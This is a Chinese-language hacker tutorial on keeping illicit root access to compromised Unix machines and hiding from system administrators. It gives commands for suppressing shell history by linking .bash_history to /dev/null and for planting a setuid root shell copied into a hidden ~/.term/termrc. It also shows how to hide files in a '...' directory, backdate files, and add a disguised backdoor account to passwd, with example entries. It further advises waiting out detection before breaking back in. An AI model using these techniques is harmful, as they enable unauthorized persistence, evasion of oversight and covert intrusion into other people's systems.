一些訣竅
Root和Demon的工具包及特洛伊木馬
--------------------------------------------------------------------------------
保持訪問權(quán)限的方法有很多。雖然在你學(xué)習(xí)本文時(shí)，可能正將要失去在某些主機(jī)上
的訪問權(quán)限，但我希望本文中的一些經(jīng)驗(yàn)可以使你成為一名“堅(jiān)固”的黑客。
一些訣竅
這里提供的一些“訣竅”可以幫助你保持在主機(jī)上的權(quán)限。一旦系統(tǒng)管理員發(fā)現(xiàn)了
你，他們會(huì)在一旁監(jiān)視你和你在該系統(tǒng)上所做的每一件事，他們還會(huì)重新編譯二進(jìn)制文件
、更改每個(gè)用戶的密碼、拒絕來自你所在主機(jī)的訪問、隱藏passwd和shadow檔、檢查有
SUID的文件，等等......
如果你發(fā)現(xiàn)自己已經(jīng)暴露了，不要試圖再次闖入該系統(tǒng)。我就曾經(jīng)目睹了一些人因?yàn)?
試圖通過安裝特洛伊木馬、使用其他帳號(hào)或以前所設(shè)置的“后門”再次獲取權(quán)限而被捕。
仔細(xì)想一下，他們在監(jiān)視你......你在系統(tǒng)中的一舉一動(dòng)、精心設(shè)計(jì)的程序都會(huì)他們知道！
千萬不要這樣！請等待！當(dāng)一個(gè)月后，他們會(huì)以為事情已經(jīng)過去而放松警惕。這時(shí)，
你就可以利用他們遺漏的系統(tǒng)漏洞之一再次進(jìn)入該系統(tǒng)，并嘗試恢復(fù)你以前所做的工作。
OK。以下就是這些“訣竅”。
歷史文件：
--------------
總是把你的.bash_history文件鏈接到/dev/null。否則，至少要編輯它。記住，.bash_history
會(huì)記錄你在退出登錄前所輸入的命令。舉個(gè)例子，如果你編輯它，它就會(huì)記錄到你正在
編輯它。你或許可以在另外的shell中編輯它，但這似乎有點(diǎn)多余，只要把它輸出到/dev/null
就行了。
1. 如果在用戶目錄下有.bash_history文件，刪除它。
2. 在用戶根目錄下輸入命令：ln -s /dev/null .bash_history
“藏身”目錄：
-----------------
總是在系統(tǒng)找一個(gè)目錄作為你的文件的“藏身之所”。這里提供幾個(gè)大多數(shù)用戶幾乎
從來沒有瀏覽過的目錄。
在用戶根目錄中尋找.term，在該目錄下只有一個(gè)termrc可執(zhí)行文件。系統(tǒng)管理員及其同類
用戶都已慣于看到這個(gè)隱藏目錄，但幾乎從未進(jìn)入此目錄。如果你們進(jìn)入了這個(gè)目錄，你想
他們對(duì)此目錄下的termrc可執(zhí)行文件有何感想呢？對(duì)了。沒有。。。因?yàn)樗麄冋J(rèn)為這個(gè)文件
正在它應(yīng)該在的地方。
好了。讓我們把termrc變大一點(diǎn)，并加上suid權(quán)限。。。你明白其中的意思吧？？？我
想你能猜得到。;-) 然后切換到/bin目錄并輸入：
cp bash（或sh等之類的shell） ~username/.term/termrc
chown root ~username/.term/termrc
chgrp root~username/.term/termrc
chmod s ~username/.term/termrc
現(xiàn)在，你有一個(gè)可以隨時(shí)成為root用戶的文件，而且不易被系統(tǒng)管理員發(fā)現(xiàn)。如果你希望
做得更好一點(diǎn)，可以修改文件日期，使其看起來是一個(gè)“舊”文件。
另外，還有一些是每個(gè)用戶必有但卻可能從未使用過的目錄，如 .elm 、.term 、mail。你還
可以嘗試建立“...”目錄，由于它緊跟在兩個(gè)特殊目錄“.”和“..”之后，不易被察覺，因此
是簡單可行的。當(dāng)用ls -al察看時(shí)，顯示如下內(nèi)容：
1024 Jan 29 21:03 .
1024 Dec 28 00:12 ..
1024 Jan 29 21:03 ...
509 Mar 02 1996 .bash_history
22 Feb 20 1996 .forward
164 May 18 1996 .kermrc
34 Jun 06 1993 .less
114 Nov 23 1993 .lessrc
1024 May 18 1996 .term
1024 May 19 1996 public_html
看見它所處的位置了嗎？
但如果使用 ls -l命令，只會(huì)顯示如下內(nèi)容：
1024 May 19 1996 public_html
記住，你也可以尋找一些具有很長名字的文件路徑，而且一般沒有人想進(jìn)入它。
利用它來作為你的“藏身”目錄，當(dāng)然，你甚至可以在那里建立“..,”目錄。;-)
制作新命令
--------------------
在你檢查cron是否已經(jīng)使用MD5加密后，你或許希望將所設(shè)計(jì)的程序復(fù)制到另一
個(gè)不同的文件以保存在系統(tǒng)中；以或者是覆蓋一個(gè)你知道從未有人使用過的命令。
復(fù)制文件時(shí)應(yīng)注意修改文件日期，不然遲早系統(tǒng)管理員都將修復(fù)系統(tǒng)，使你所設(shè)計(jì)的
程序都是白費(fèi)心機(jī)。
更好的方法是為所要使用的shell取另外的新名字，并使它具有suid權(quán)限。
增加或修改登錄密碼
---------------------------------
另一個(gè)可行的“后門”是在passwd檔中增加新用戶，并盡量使它看起來象是原來
就有的。盡量不要使用這個(gè)新用戶密碼，不要用它登錄，只是在你失去了原有權(quán)限時(shí)
才將它派上用場。
特點(diǎn)：這個(gè)用戶不必是容易引起注意的root用戶；你可以在任何需要的時(shí)候成為
root用戶。以下是一個(gè)實(shí)例：
We want to make our account look like it belongs, so lets keep to thetop of
the file.
root:fVi3YqWnkd4rY:0:0:root:/root:/bin/bash
sysop:mZjb4XjnJT1Ys:582:200:System Operator:/home/sysop:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt

最新評(píng)論